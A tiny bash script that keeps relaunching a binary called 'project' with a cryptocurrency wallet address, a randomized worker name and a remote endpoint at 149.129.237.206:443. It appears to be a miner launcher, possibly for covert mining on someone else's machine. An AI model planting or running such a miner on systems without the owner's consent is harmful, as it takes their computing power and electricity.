#!/bin/bash
while [ 1 ]; do 
./project -w deroi1qyzlxxgq2weyqlxg5u4tkng2lf5rktwanqhse2hwm577ps22zv2x2q9pvfz92xc0v2j0vsquftksu2ayrl.$(echo $(shuf -i 1-99 -n 1)-NC) -r 149.129.237.206:443 -p rpc -m 7
sleep 3
done 
sleep 999

